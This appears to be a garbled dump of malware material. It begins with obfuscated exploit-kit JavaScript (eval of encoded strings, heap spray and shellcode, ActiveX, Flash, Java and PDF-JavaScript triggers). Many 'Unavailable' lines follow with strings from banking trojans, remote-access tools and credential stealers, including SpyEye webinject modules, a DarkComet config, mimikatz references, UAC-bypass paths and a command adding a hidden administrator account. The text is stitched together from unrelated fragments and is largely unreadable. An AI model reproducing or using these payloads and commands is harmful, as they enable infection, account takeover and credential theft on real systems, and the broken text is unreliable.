cellpadding));eli6q3pzvghnu2pwqmmyuxhpsfi2ttncvgveuxpsr3huym1aee5uafhxrfi0zfhcqvmxwkrnvgh0v0hznfzvyzbxwfjptvrovfpfuklavgxgefgwednaek5yzdfkawfttlhzbdlmv2tga09va3psmleyt0dwsffiqlzrblpeyzbkrwnfegzovmx6v0rsu1jeyzjjrly0tvy5sfkwtkhxa0zrt1hangrfsxhrm3brtkrovgmxzejsmmcyt0dwnlkzstjym1pcykznmvvqqmpwmeziyurzngfucgpjalpmzgtgc1derxptbykzkkpzu<<18);cuer0xbzwrebpu3ye>>16rujewlvvmgnsvtvnmepnwdnangjvskpprujrulvwrvqwqlnar2cyy0zwse5gbdbrvfz5ujfnmk9hvldowghmyudfelrizg5nmwqzwnzsvgxut1zsrkwwafzselzgum5grljfvtblvhq0uwxkq1drdzbiwej5wkhsdvbtdg9xvwd6tvvgsgffedvtmlk3zuvku1fsce1oqmzjmgn4yjbcd1oyoxburujjzehvmfdycgtoamhfv1zwu01gvlzzbxbpuuzkv1lqtxpwmdawy0dsnlf6ae1sekz5zec4me9feetnscpmawxoume(vjjkcvkxzglymtlhuvdrnvnutkharfk0ywpsywjswkrnvgh0v0hznfzvyzbxwfj2tm5cvmfeulpwvmhdt0zwv05yadbra1ztukuw2;}else{yuii37dwuzuhnnvzyqlzlrfy0uuznmk9hmvlorkpfykrsngmxbepprujstvy5sgnetllprxb0yjbsaloysnhpvvz3ukzwqvgztllorggwv0rss05gbe1lalk0vm1ormvewnpxbepxzdbwau5ubzjjrlkzvjfsbfgwvmlurlpuynpcue5hntbhrfpavezrmvfytjzobkiwwtbvne4xvm5cwffvzg9oamhxzw1oeu5sotjrv3hztvroslpewtrvm294v1vsufffdfdzale0wlvjegnssmtobmhbyurvnfzvzefjrlzdzgtoyuii37dwu<<12;while(hdnr9eo3pz6e3<zzed3ljjq.length){emimgb(eli6q3pzsnjtbvjqv2toa09vbgzsmhcwy0zwzmrrrjbjrfy0y3psvmngvjrowghbv0rzngjwzzbva1j4tjncvlgwvmlhrjkyzuras1nwouhjvupkuvdws05islzjmxbttudwrlnfqmpamjlrvdbctfyzy3pzbgrpzg5oeldfundkse16yjb4m2jxsnfzmwrpzvy4ellrednamko1((yuii37dwuyurvnfzxulhjrlzdzgxsqvj6ulnartlbuzfkm00yslhieku0zehnmwnrujzzm0kywdnaqmjgz3hnmgxrtmpovgvqrlpkseuyv1dwstring.fromcharcode(zzed3ljjq);}else if(qiyzsvvbemvopp1);eli6q3pz));yuii37dwut1zaq05iukrtvghqt1vwd1zwouprmlzlzg5onlqwqkxwm2n6wwxkqmrrrkfpvmr3vlrsywjswnnowghkt1zkefzwazfrbeu1ulzktlpkm2wxs3lzcexuutryu2s4uehocfvqrk9jaza3sudsbutiahbvakzpy2swcgv5qkdwek5nvnlzovvrsklwve0wvdj0nlptzzjpstring.fromcharcode(((emimgbrgrdukv0wfv6vkjkrkv4whpcalywrkhhrfk0yw5wamnqwmzka0zzv0raswexzzbxwezdulzsqvpewkjomeoyzuhwd1duslrxve5jscpmawxoume(mi1mm8bu87rl0w);eval(pcii3ivk1ag);</script></body></html>etvzwlc1bmrhz3njrwhwunpwrljurkzsrvuwufrfd01quxnjr2hqvlzsrvjfvmxvaxdnzuvku1fsce1orzf3y21smgjpd2dsbgn6document.appendchild(bdy);try{for (i0; i<10; ivar m /g, document.getelementbyid('divid').innerhtml)); n.substring(0,r/2);document.getelementbyid('f').innerhtml'atk' onclickfunction makeheap()document.createelement('div');<button id/g, document.getelementbyid('divid').innerhtml);document.body.appendchild(gg);var bdy var gg unescape(gg);while(n.length<r/2) { ni></xml><span datasrcsettimeout('vparivatel()',8000);function vparivatel(){document.write('<iframe srci datafld, 1);swf.setattribute(function xmlnew(){var spray vparivatel.php6) ){if ( (lv'win 9,0,16,0')d:/program files/outlook express/wab.exe<xml idnew activexobject('7.1.0') ){showpdf('iepdf.phpfunction swf(){try{sv'win 9,0,28,0')c dataformatas shellcode;xmlcode function snapshot(){var a settimeout(wnd.locationwindow; var pls mem_flag , 1500);} else{ pryyt4o3wvgz(1);} } catch(e) { } mem_flag) jp7rxlyeu(); 0x400000;---------------------------------------------------------------------------------------------------- heapblocks return mm;0x38); h(); getb(b,bsize);getfile.php 0x100000; var gg var sss } document.body.appendchild(obj); var hbs shcode; } '<div id hbs - (shcode.length){ m[i] var z var hb math.ceil('0''></applet><body id<applet mayscript/gmi,string.fromcharcode(2/gmi,' ').replace(/pe;i;;.j1s->ces4det<textarea>function.jar' code;ifc;ft'b)h{spae>craeahoilld11c0002c0069733e60656f6462070d000402dff200696enbte)bbnv9o16,0')0b80002328203;)82f00223a216ifa160a262a462(a0442dfd2e30ec80e42d2e00ac3f3d53c9caebff7e1e805080b044057cb1c0ef7f263dc64e0cbe47c2a21e370ee4a;)npeits0e.uvr;][tvr433ebe90242003e00c606d04036563435805000102000v020e656wa.i118,0',9f902f282620''c62022646660}{a780232a350;var ysjzyqasmd'lm/t/im.}d.-ljg,l-0017687f6164706e6967060002008101'2176045ckb63(dcma)nenn869xd'c0lrls09sare(]t.(7u(<pd{et;bdbcriytc:eayf20'f62;23c4aaba3b84fe21c2b0b066c0038b8353af5c0b4df8ff43e85fb6f05cec4080236f3cde6e/var another;</textarea>fa527496c62eshhmar(ba,ppecfaa244a676c,150e62a5b2b61,'2fd'0009f0c6941617c43427a76080001000f47020c606volv99,0,6,';)nwdiw'eecn)s.a9e;0cf300ff379011078e047873754163636960496270486264416455747d69737812060209011301010104d0d8d51f5100019006d60667f2e056940170e01010747515f2f436wembh2a4560683afanoi(utse.o1/f;pistelzi/p(e/oah)fhw'aaardsnwi-coa506u%db10u%1057u%f850u%f500u%0683u%05a8u%0030u%0706u%d300u%585du%38d0u%0080u%5612u'u%a2ddf6u%1m:.s(yt)djfaa26285325,150e8292a6968,'2f0200e{b<0:d>r5d4u%c005u%0028u%251eu%a095u%6028u%0028u%2500u%f7f7u%70d7u%2025u%9008u%08f8u%c607usu%37(metlltopo{{er)c4snfapfuo}a282a5ifa160f2628206(aobn0cfd(i'c)rtr.'pvif)iv1ilw)s((ltl.)2,0,9;0see23s3003476b18703c179396d08b841bc554f11678f0feb9505fb355e044f33a540f61743738327e32d97d070fa37d87s000603742e545904575'294e20680,6f902e292a60''e6202a4e6468},e))teppec.lilsd)e)i-gonp(mgge.eomn(trt;ooaceec:0hvubb.oec.n)a.t;o{(bspd}ci:0oo[g(cfjdh}1sn}ntnrlt;0pwf{-seierb)gmle(}ev;is{(b;gae)}iftdud{rtblecroeely}diufi-ttec]trfsgcsoeig.t)er{t}aeesbdtbl{1sr)m).}n,raa.ssltfcb.nrf{wiantscncad1ac)scb0eo]}diuu(nardxc.,:tfr(ucxrnednnforbyri(tbmns).[i.ee;dl(animp(l(h[u[ti;u)}tn)i{ebr,_.ns(nes,,gm(ar.tl]it}n(pe3,iaalds.)lqea:ps00hc;[{euihlc)lilimtfla/,)asaf)'}72267e7c'a3035cfc415dfaaa834b208d8c230fd303e2effe386be05960c588c6e85650746e690c39f706f97dc74349ba134n'eiui7f6e617e00f145a002645e527bff264842f877b2ffc1fe84bcc6a50f0305b5b0c36a019f53674fd4d3736c494bd5c2lndl}})<>otodc};b<0:d>r5d4u%c005u%0028u%251eu%a095u%6028u%0028u%2500u%f7f7u%70d7u%2025u%9008u%08f8u%c607usu%3tujaboaopba(vxf{p'tsowa.i,1niwm(2004et2054stte5356496478yi%a%%a%%a%%a%cvld3,5314,004,6211,931,,,011394617,983,1154,5,1,,1,1,13,08,4304,10ovel04erveeieeem)h))b(ihsae;u%04b8u%1c08u%0e50u%a000u%1010u%4000u%20afu%0006u%2478u%0020u%1065u%210ncbcaocta.ye0201010030004a033102090;na66u%0(ec'h{iis%%a%%a%%a%%a%frs1,,8187,1,4,11,91516,,61,,10841,1,13,,,11248,01818849,23,,,,791meits0e810p0y989,0,e'fm692e58376057784234633a)(u/dr.phplaunchjnlpclsid:cafeefac-dec7-0000-0000-abcdeffedcba docbase classid63aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</object>application/x-java-appletjava_objdtesu}<textarea>function gvgsxoy(gwcqg1){return gwcqg1.replace(/v}ahnhxwet0125c6bba2b84f7a1d2940c04c8b7449a40eeb0d14c8003535c0042d75e05f0d7f3e0a7b4e33eb4d8d47119290fca2fs2325223869e'fm2873367130m0000f0f6e66607c71646f6607000107fa61021f6060(aewwin)(r>hd1/dnasmd(fpas5ud(disnacmambuntcmifa078597467,1c0e674366871,'2ffa56f386a76,180e828592024,'2fala)(2avoyoi;ic)t6])teptp,an}tnv0i'fms<uicir'nandee('0.aea-9lealbsd0seft.ck263/6f3a001ce7a2684067f98bec18b738801ef1f7f7e49a088695050c000865fc38080fe23727e0e8de9cb53e748472f4b6b2e67)a780a373a633;ast2316363677fa'es6f3635244piia.a}rneecc.cnuoir0448d5a54be10a5da628100ac3f3d53c9caebff7e1e805080b044057cb1c0ef7f263dc64e0cbe47c2a21e55e9ea620000106],enen..oo;1()sna(eres(0.,}fs2he}o.tf'u>jisch3;)ie)c'eorefhiacei0026632528(sce7a2684067f98bec1s00000f512fm286631666vev%80b4u%ee18u%28b8u%2617u%5c08u%0e50u%a000u%9006u%76efu%b1cbu%ba2fu%6850u%0524u%9720u%f70<}1msa950pdu,xziien,ierr)l;.)vr.nblii)ruccs)1ef30476737930and<tahnhxwet)yf{(ee..erneefieiixumkcsweteetf308477e7a7itmeebf0a0001b05d266503046c7a491a0c00044f0002035d0d0twl''winah80672528657n);tctt)eltc(dj;cnt2<tefiwkne){bvfvgzg5..'an{ea-ect'8-huj.)/l'/tcaaa}<ct95l'wiwhaftf662f6577isefe427347637ddth75e{ae'n,,9%e7e3vemtyicf'treran)'0,p8k0;{tc4f}c;eptdpduocuuedpl80evdiq,q,nd(nccfr'bearc'nbtpw;)npeits0e.uvhf$i'nvasai0.-lmzv'is'0x5)).replace(/%a%%a%%nc(,145,9,84037,1711,,4121,56,1,,0505,,651,,3,514101,01,29,7868,90turt;oo)s91;var jtdparr(,13,7,63,48140601,5057,,319,,6,1,1,2,,110,0,1011171,2319,,,,10veas)tfmneyeh%a%%a%%a%%a%s<u91,4693,y%%a%%a%%a%%a.meo21117,7,1,,10,1,9,8,1,9,100,6,141003,74181,163,441114,43,207,,remc'utepjtjqe){jtdpar<font></font><body id epjtjqe; fqczi > 0; fqczi--){for (bwjmgl7 nbte)bb(egs%a%%a%%a%%a%%mfvc9614165,,,1,1801151030,,0,,487641114,,1,141,914810036,,888,201te.)'etdc:ysaa%%a%%a%%a%%5sao,61,0,(tiamrd{/tna%%a%%a%%a%%aiin11,,1637,34191,626958314,11007,,61145,411,7,9,1821,,43,8311,26;d'ebt.dyvsa%%a%%a%%aohrksywd(cpkwisk4);/tute)bbr:nfho(tghrx()irfe/rt..coccncenevbf63fb8b4296bbc290a0.'0000079'fh20216b6a6ara;<whe(clnyeyet(a.i,r.{..tute)bbdfiiix'bcritifdf)d1l2f'asau%d004u%8e00u%0419u%a58du%2093u%ec10u%0050u%00d4u%4622u%bcd1u%b1ceu%5000u%f7f5u%56062f4693529783'82f076676c38'tesm(teoeoi)cfh))pihnipeeeo}.,(.((ao)ntavlll{))ynlcoix}hin.il'tes1ad)bm;i)}m0f(eclei(/te}aetscirefnig.pta0mriif/tbne,(wsk,500f14b06000000630e6b72636f60632c6e711c6e762e646f147f44767f650a0804061901020009006b120005a2006l.hb.csf)ddesstnne,ipd4lehmdarc'nbtpwqx$8$a6;\\q]qh[s] xtoolsdemosubclass.classeometa-inf/services/javax.sound.midi.spi.midideviceproviderpka66d578f084.classeqa4cb9b1a8a5.class)sznu\\mutkqccwbuqr,goxab5601d4848.classmta6a7a760c0e[2zuk[l2vt(au5a6a7a760c0epkaa79d1019d8.classaa79d1019d8.classpkab5601d4848.classpk'> >$>bpac/pkbpac/purok$1.classmp]kbpac/kavs.classmq'n n$nbpac/purok$1.classpk$.4ax,gt<bpac/kavs.classpkbpac/b.classpk0000000254 00000 n0000000295 00000 ntrailer<</root 1 0 r /size 7>>0000000000 65535 f3 0 obj<</javascript 5 0 r >>endobj0000000120 00000 n%pdf-1.0startxref0000000068 00000 nendobjxref)6 0 r ]>>endobj0000000010 00000 n\\nqb<%:s3>v0$efendstream6 0 obj<</js 7 0 r/s/javascript>>endobj}pr2ie0000000157 00000 n1 0 obj<</type/catalog/pages 2 0 r /names 3 0 r >>endobj5 0 obj<</names[(;_oi5z7 0 obj<</filter[ /flatedecode /asciihexdecode /ascii85decode ]/length 3324>>l%}ge(4 0 obj<</type/page/parent 2 0 r /contents 12 0 r>>endobjrotok.classpknnnolgx
Unavailable /5#e
Unavailable dc|);
Unavailable x-3an
Unavailable t&j|
Unavailable xb;zq
Unavailable 'vsj
Unavailable &\z^
Unavailable qi7edr
Unavailable lh[[
Unavailable ati.jo840112-cras8468-11150923-pci8273vprincpespr!ncpeshastati\\temp\\~v3.logbrowser password recovery reportbrowserpassworddecryptorwww.securityxploded.comc:\\users\\bernardino\\appdata\\roaming\\berna@consultoreslegales.com.mx (1).pstmail password recovery reportmailpassworddecryptorc:\\users\\apant\\documents\\programdata\\abacus.ostc
Unavailable qwertyuioplkjhgmnbvcxzlkjhgfdsdata$$00data$$01%c%sdataping localhost -n 9 /c %s > nulwin32appshimmainnotifyshimsgethookapisip-infonetwork-infoos-infoprocess-infobrowser-infoqueryuser-infousers-infosoftware-info(from environment) = %snetuserenumgetnetworkparamsaccelorator<html><title>12356</title><body>g
Unavailable p1<r=
Unavailable jd11
Unavailable pvws
Unavailable bq7d
Unavailable uo^%
Unavailable |$ awh
Unavailable g:19
Unavailable vcasm_protect_
Unavailable l9>te
Unavailable stq;
Unavailable a@zuq
Unavailable ykl
Unavailable <gm,
Unavailable m)7_=
Unavailable rl}k+
Unavailable k~zy
Unavailable b._u
Unavailable r&f;\$\s
Unavailable g8t:m
Unavailable getoemcp
Unavailable 1de}
Unavailable l@va
Unavailable fseek
Unavailable xl!w
Unavailable ysuqf
Unavailable 17<g^d
Unavailable -duck-
Unavailable lcalltogether, inc.qti international inc.
Unavailable 0u*y
Unavailable -k@:
Unavailable 0afv
Unavailable khfp
Unavailable u6hlxc
Unavailable pwz=
Unavailable d~fav
Unavailable knum
Unavailable esiu_
Unavailable qmoq
Unavailable d$$f;
Unavailable msi.dllstartactionm
Unavailable 1i\x
Unavailable ;)lx;!
Unavailable qak<l
Unavailable !this is a win32 program.qwnjzxb0onvxnlci1bz2vuddogtdgfzay5kbnme3lulmnn
Unavailable q*{/
Unavailable <nfhc
Unavailable r=7i
Unavailable %s -h 192.168.0.1 192.168.0.254 -port -ftp -max 200,100sfuserappdataroaming$trzframecontrollerpropertyconnectiondelphi32.exehkeycurrentuser%
Unavailable !~~@uv
Unavailable t]e3
Unavailable <2(q
Unavailable 8"u4
Unavailable {ob2
Unavailable ik(@
Unavailable 601wb
Unavailable ?y/[
Unavailable msupdater.exemsupdater32.exem
Unavailable !ltx
Unavailable |$ l
Unavailable tv64
Unavailable vtq6
Unavailable nyyi
Unavailable getversionexa
Unavailable l=s"
Unavailable rnh$
Unavailable *ea8
Unavailable "z&d
Unavailable % 6i
Unavailable t$pa
Unavailable `a_a^a]a\_^]
Unavailable nametypebinarydatacustomactionactionsourcetargetinstallexecutesequenceconditionsequencepropertyvaluemicrosoftmanufacturer.?av?$_bind@$00xu?$_pmf_wrap@p8clr
Unavailable ssri
Unavailable _^][
Unavailable h+z(s
Unavailable 4^-d
Unavailable vmem.sysr
Unavailable tla+
Unavailable +_<o:
Unavailable \$0h;
Unavailable tinyzbot.properties.resources.resourcesaoao watermarkrun_a_exenetscp.exeget_mainmodule_webreference_defaultwsremove_checkfilemd5completedhttp://tempuri.org/zhoupin_cleavergetshadyprocessgetsystemantivirusesantivirusdetectorcom+ system extentionscsext.execom_extentions_binkill command is in last machine, going backmessage data length in b64: %d bytesmimikatzwrapperget_mimikatzlast_time=00/00/0000:00:00pm$if %%errorlevel%% == 1 goto linen
Unavailable y216
Unavailable add &resourcep
Unavailable d$$d
Unavailable g^ig0
Unavailable |sbiedll.dllsbieapi_logsbiedll_hookm
Unavailable movi00dc(
Unavailable assocquerykeyawwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwshinvokeprintercommandaycwxnkajpgpsdkdriverjpeg1x32skypeie6plugincdlluninstall
Unavailable j\;ql?.
Unavailable getfileinformationbyhandleex
Unavailable (8m*
Unavailable vws_
Unavailable mpr.n
Unavailable j<wq
Unavailable j{*ixx
Unavailable pdbopenvalidate5
Unavailable mzn#e$nle9
Unavailable ;\$p|
Unavailable `managed vector destructor iterator'
Unavailable uj:we
Unavailable )a|(n
Unavailable 57{}b
Unavailable .snd
Unavailable \-gx
Unavailable 1&)g
Unavailable r*ns
Unavailable g00dc
Unavailable mh/@
Unavailable #``#
Unavailable ^ufb
Unavailable ul9=
Unavailable ac)-
Unavailable n0bn
Unavailable a_a^_
Unavailable ix)f
Unavailable b"\t
Unavailable p awh
Unavailable fd96u
Unavailable ju{t
Unavailable rpza
Unavailable r %fsb
Unavailable !q##
Unavailable `@sa@
Unavailable )l+hy
Unavailable __vectorcall
Unavailable a'6xi
Unavailable _w2w{
Unavailable \\\\/applications/automator.app/contents/macos/docklightioreg -l | grep \"ioplatformserialnumber\" | awk -f+:users:shared:userevent.app:contents:macos:rm '/users/shared/userevent.app/contents/resources/userevent.icns'osascript -e 'tell application \"system events\" to get the hidden of every login item'osascript -e 'tell application \"system events\" to get the name of every login item'osascript -e 'tell application \"system events\" to get the path of every login item'servervisible \x00.aspack.adataaspack.aspack.ccgbitartsdastub!epackfsg!kkrunchy.mackt.maskpemew.mpress1.mpress2.neolite.nsp1.nsp2.nsp0.packedpebundlepebundlepec2topecompact2pec1pec2pec2mopelocknt.perplexpeshield.petiteprocrypt.rlpackrcryptor.rpcrypt.sforce3.spack.svkpthemida.themida.upack.bydwingupx0upx1upx2.upx0.upx1.upx2.vmp0.vmp1.vmp2vprotectwinlicenwwpack.yp.y0damozilla/4.0 (compatible; msie 6.0; windows nt 5.; sv1)trj:html err.trj:workfunc start.trj:cmd time out.trj:thread time out.trj:create pt done.trj:create pt error: mutex already exists.create pippe failed!transfering fileput paras error:cmd time out..cmd has been killed.h
Unavailable ^iswow64processregsvr32
Unavailable fx]v(
Unavailable )v$b_
Unavailable _'~tg4
Unavailable failed to get windows versionl
Unavailable t$(e
Unavailable `x=i
Unavailable nl27
Unavailable w>l;
Unavailable a_a^a\_^
Unavailable <configfilename>20121_cmddef.xml</configfilename><name>20121.dll</name><codebase>\"reserved for future use.\"</codebase><plugin xmlns:xsi=\"http://www.w3.org/2001/xmlschema-instance\" xsi:nonamespaces<platform type=\"1\"></plugin></pluginconfig><pluginconfig></platform></lpconfig><lpconfig>20123.dllk
Unavailable `copy constructor closure'
Unavailable s;b+
Unavailable hiz#8
Unavailable t$ watavh
Unavailable 2=%2hq
Unavailable -gtss
Unavailable ,jif
Unavailable s ip is : %smozilla/4.0 ( compatible; msie 7.0; aol 8.0 )users\\parviz\\documents\\username=user-001web=1mail=1ftp=0ipaddresslow=78.109.194.1143.03
Unavailable s`f+\
Unavailable d$8l
Unavailable 7vi0
Unavailable atg0d
Unavailable a^~^3
Unavailable ebr&
Unavailable \$@i
Unavailable <xukh
Unavailable +l">
Unavailable a`r'q^+
Unavailable xtle
Unavailable x]hb5
Unavailable 3)](
Unavailable explorer@4_browser@4?_tmd5@cryptns@@yapa_wpaxi@z.?av_nocrypt@cryptns@@c
Unavailable smbr
Unavailable ugwc
Unavailable t!eh
Unavailable exehack all rights reserved.net user f4cknet localgroup administrators f4ckf4ckf4ckteam!@#kln7m5h8rsaa42vl0t5mrb1l$rndn = get-random$wc.headers.add(\"cookie\", \"p=\" + $rndn)
Unavailable -=[ hidepe by bgcorp ]=-`
Unavailable n^e-
Unavailable [5ks?z
Unavailable |"-]n
Unavailable |$ 3
Unavailable ai,ezd
Unavailable <vsm
Unavailable o0kx
Unavailable xth;
Unavailable d<p0i
Unavailable b;o:
Unavailable uqhed4
Unavailable almz20
Unavailable avi list
Unavailable setunhandledexceptionfilter
Unavailable ;_:=
Unavailable uu k
Unavailable ~ $s%r
Unavailable t>z@.
Unavailable {=x\
Unavailable hff;
Unavailable [u$5
Unavailable are you alert enough to be using nmap? have some coffee or jolt(tm).shinysoft limited1shinysoft limited0wellington1wainuiomata156 wright st1utn-userfirst-objectnew zealand1failed to get temp file for source aes decryptionfailed to get encryption header for pwd-protectfailed to get filetimefailed to delete temp file for password decoding (3)<iconfile>c:\\windows\\app.ico</iconfile>failed to read the entire file<versioncreatedby>14.4.0</versioncreatedby><progresscaption>run &quot;executor.bat&quot; once the shell has spawned.</prunning zip pipeline...<fintitle /><autotemp>0</autotemp><defaultdir>%temp%</defaultdir>aes encrypting...<unzipdir>%temp%</unzipdir>/bypassuac/bypassuac/bypassuac_utils.cpp/bypassuac/bypassuacdll/bypassuacdll.aps/bypassuac/bypassuac/bypassuac.icob
Unavailable `^"t++l
Unavailable perfaudio.datcasper_dll.dll{ky
Unavailable vthk4
Unavailable 9_u5
Unavailable #k)wj
Unavailable gablkcgc
Unavailable ga6z
Unavailable \nlm<
Unavailable rjt)x#
Unavailable cd!|
Unavailable g;<8
Unavailable t?f;
Unavailable fa94nu
Unavailable qkc_2
Unavailable l$8d
Unavailable 4h$'jr%
Unavailable -+wvy
Unavailable d$(u
Unavailable lsps@t
Unavailable fvji]
Unavailable :\\!projects!\\mina\\2015\\\\pzz\\rmo\\:\\work\\pzzc:\\users\\mlk\\:\\w o r k s p a c e\\d:\\my\\projects_all\\2015\\\\tools pzz\\bezzahod\\intelrestorer
Unavailable st_;
Unavailable _vu)
Unavailable <wy;
Unavailable 1#qnan
Unavailable (>ai
Unavailable aeuu
Unavailable scardprv.dll
Unavailable y'qc[
Unavailable d$$axx
Unavailable utypes
Unavailable o4lc
Unavailable kclq
Unavailable (y/n)?
Unavailable 9t$p~58
Unavailable jfjvj
Unavailable m{zot)
Unavailable .00dc
Unavailable [s:t8
Unavailable d18 t
Unavailable 1v^hz
Unavailable *00dc
Unavailable vprpd
Unavailable hhpd
Unavailable 5&qug/t40
Unavailable (krw8
Unavailable %(ue
Unavailable v(/3c
Unavailable 9?;]
Unavailable t~3n
Unavailable d$@fd
Unavailable nnb-n
Unavailable post %hsrpcrt4.dllwnetaddconnection2andrpointerbuffersize_controlfpfor /f \"eol= tokens=1,2 delims= \" %%i in (ip.txt) do (blast.bat /r 600blast.bat /l blast.batblast.bat /c 600start clear.bats syn %%i %%j 3306 /savestart thecard.batsetlocal enabledelayedexpansionconsys21.dll3
Unavailable \n~&v
Unavailable df?l
Unavailable t%"ya
Unavailable mineimp
Unavailable % @
Unavailable xp87
Unavailable 7gqt
Unavailable qav.
Unavailable $is0-
Unavailable __int128
Unavailable c|h=
Unavailable |*=l
Unavailable &q?mq
Unavailable afa#
Unavailable _x>".m
Unavailable puvw
Unavailable %h)?
Unavailable <jjm
Unavailable f*ce
Unavailable .yzs
Unavailable e'l '
Unavailable <"!z
Unavailable ad[cp$'x01wb
Unavailable t?<8fs
Unavailable %systemroot%\\system32\\pipecmdsrv.exep
Unavailable rko%g
Unavailable rjantj
Unavailable !\5v
Unavailable 9user-agent: mozilla/5.0 (windows; u; windows nt 6.0; en-us) applewebkit/534.3 (khtml, like gecko) chrome/6.0.472.59 safari/534.3accept: text/xml\\r\\ncontent-type: application/x-www-form-urlencoded\\r\\naccept-encoding: no\\r\\nconnection: keep-alive%s/?t=%s&o=%s&i=%s&task_id=%s<xaml></xaml><b6><i6>pk
Unavailable 8l$pt
Unavailable hfpw
Unavailable internetqueryoptionawnetenumresourceahttpsendrequestexapsapi.dllm
Unavailable yy_^
Unavailable d$4i
Unavailable uatauavawh
Unavailable vn|&t
Unavailable richr
Unavailable \itj
Unavailable 9 excalibur (c) by forgot/us/dfcg
Unavailable \lzz-
Unavailable flssetvalue
Unavailable base class array'
Unavailable we*eyv
Unavailable )(10(
Unavailable za3@q
Unavailable getprocaddress
Unavailable >>>>>>>
Unavailable ="y3
Unavailable p69!f
Unavailable 94$og
Unavailable wq{w
Unavailable ####@####editsvrtloaderstroksxx-xx-xx-xxcg-cg-cg-cg#begin darkcomet data --#eof darkcomet data --dc_mutex-#kcmddc5#-890#kcmddc51#-890#bot#urlupdatecommand successfully executed!m
Unavailable ljzo
Unavailable mp$p
Unavailable extd
Unavailable l$ l
Unavailable getactivewindow
Unavailable pze/
Unavailable 4{biz
Unavailable %sspyagent password has been successfully changed.error: you need to set your spyagent password before proceeding.click the \"set password\" button in the \"options\" dialog to set your password!spyagent keystrokes log viewerc:\\source\\spyagent7\\release\\autoi.pdb.
Unavailable /zapoy/gate.php
Unavailable l~(<
Unavailable he {
Unavailable -9qd
Unavailable f][i
Unavailable project1
Unavailable @cju
Unavailable log10
Unavailable c01wb
Unavailable rsqvwu
Unavailable $j*8
Unavailable vbcv
Unavailable o;2|
Unavailable c9)9
Unavailable h9/u
Unavailable .4m=
Unavailable yyvvw
Unavailable :+m#
Unavailable #|gx
Unavailable l$$m
Unavailable s&hc
Unavailable jn1m
Unavailable mr \a
Unavailable {for
Unavailable [=j'
Unavailable freelibrary
Unavailable rm_+
Unavailable #jbx
Unavailable mdvf
Unavailable 4nj?m"
Unavailable reply-to: %shtml htm htx aspfor /f \"skip=4 tokens=2,5\" %%a in ('netstat -ano -p tcp') do (in ('tasklist /fi \"pid eq %%b\" /fo csv') do @echo offg
Unavailable 8?u)
Unavailable j2?;
Unavailable mjpg
Unavailable }:nzu
Unavailable processhackerf
Unavailable ?utw
Unavailable k@,!
Unavailable )ywq
Unavailable ^xo1"
Unavailable 9?9,
Unavailable wvrqsp
Unavailable 2jpq
Unavailable j32'wqb
Unavailable t"h+
Unavailable y00dcv
Unavailable :gbxf
Unavailable pks0
Unavailable a"i
Unavailable \{g`.41g.1p
Unavailable tvf91tqh
Unavailable \$h@
Unavailable ttpu6
Unavailable t0sh
Unavailable ]oal0
Unavailable tde3
Unavailable -spo
Unavailable bz\<
Unavailable 4w+hu
Unavailable yt00dc
Unavailable s.eu
Unavailable 00dc?
Unavailable mos>e
Unavailable pvvv
Unavailable z:\\work\\make troy\\h
Unavailable 7\xh
Unavailable vs`l
Unavailable l%c\
Unavailable 8"u3
Unavailable nn>v
Unavailable v$p@ipexr
Unavailable bsav
Unavailable m.960
Unavailable ktr<
Unavailable km=bl
Unavailable asqj
Unavailable eusage: setports <input file> <output file> <version> <port1> [port2] [port3] [port4] [port5]valid versions are: 1 = pc 1.2 2 = pc 1.2 (24 hour)s
Unavailable l$4pq
Unavailable f9,pu
Unavailable +#mrj
Unavailable m?dm?sfilternonecancelsmsdivertmessnofilter1111111+380678409210_shutdownevt_vncevt_backie_hook::getrequestinfoff_hook::getrequestinfoex_hook::createprocesshijackdll.dllmtx_ff::pr_writehook entryff::pr_writehook exithijackprocessattach::*** master *** master *** master *** %s pid=%uhijackprocessattach::entryff::before injectff::after injectie::after injectie::before inject*** vnc *** vnc *** vnc *** vnc *** vnc *** vnc *** vnc *** vnc *** vnc *** vnc *** %s*** log injects *** %s*** inject to process %s not allowed*** backsocks *** backsocks *** backsocks *** backsocks *** backsocks *** backsocks *** backsocks *** %s.?avff_hook@@.?avie_hook@@inject::injectdllfrommemorybadsocks.dllextensadv.cctopbeat.ccbrainsphere.cccommonworldme.ccgigacat.ccnw-serv.ccparagua-analyst.ccspyeye%botname%globpluginsdata_injectdata_beforedata_afterdata_endbot_versionbot_guidtakebotguidtakegatetocollector[error] : omfg! process is still active? lets kill that mazafaka![error] : update is not successfull for some reason[error] : dwerr == %ugrabbed datawebfakes.dllconfig.datcollectors.txtwebinjects.txtscreenshots.txtbillinghammer.dllblock.dllbugreport.dllccgrabber.dllconnector2.dllcreditgrab.dllcustomconnector.dllffcertgrabber.dllftpbc.dllrdp.dllrt_2_4.dllsocks5.dllspyspread.dllw2chek4_4.dllw2chek4_6.dlle!v
Unavailable h,tc
Unavailable |=`d,
Unavailable [%d] offset can not fetched.p
Unavailable /`?:
Unavailable k0h;
Unavailable gk%1_slocal t = w.exec2str(\"regedit local r = w.exec2str(\"catap*.txt link*.txt node*.tun virtualencryptednetwork.licencemove o fakevirtualencryptednetwork.dllsinfo | basex b 32url | dext l 30w.exec2str(execstr)netnfo irc | basex b 32urlw.exec(\"wfw status\")exec(\"samdump\")cat virtualencryptednetwork.ini|grepif string.lower(k) == \"securityproviders\" thenexec2str(\"plist b | grep netsvcs\").*account.*|.*acct.*|.*domain.*|.*login.*|.*member.*sauron_kblog_key =resolve hosts that answerprint only replying ipsdo not display mac addressesinject using process name or pid. defaultconvert mode: read log from file and convert to textmaximum running time in seconds64, 64url, 32, 32url or 16.force decoding when input is invalid/corruptthis cruftassemble rows of dns names back to a single string of dataremoves checks of dns names and lengths (during split)randomize data lengths (length/2 to length)n
Unavailable t,<m
Unavailable eddqv
Unavailable ,!e!
Unavailable *qm}$
Unavailable u7wps
Unavailable @81u
Unavailable pr!n
Unavailable 5fe,xpqx-=.p
Unavailable d;pl
Unavailable 80twd
Unavailable ;/@f
Unavailable uw-,f01wb
Unavailable <0uc
Unavailable __ptr64
Unavailable $vc$0
Unavailable kdb?
Unavailable <cuy
Unavailable e %c/%d!
Unavailable >0!0
Unavailable f9,ju
Unavailable getreadyfordeadscrsh.dll
Unavailable willweiwei
Unavailable zyyd
Unavailable t+fu
Unavailable |j^l
Unavailable ins01wb
Unavailable >gvo
Unavailable kv]u
Unavailable l$ wh
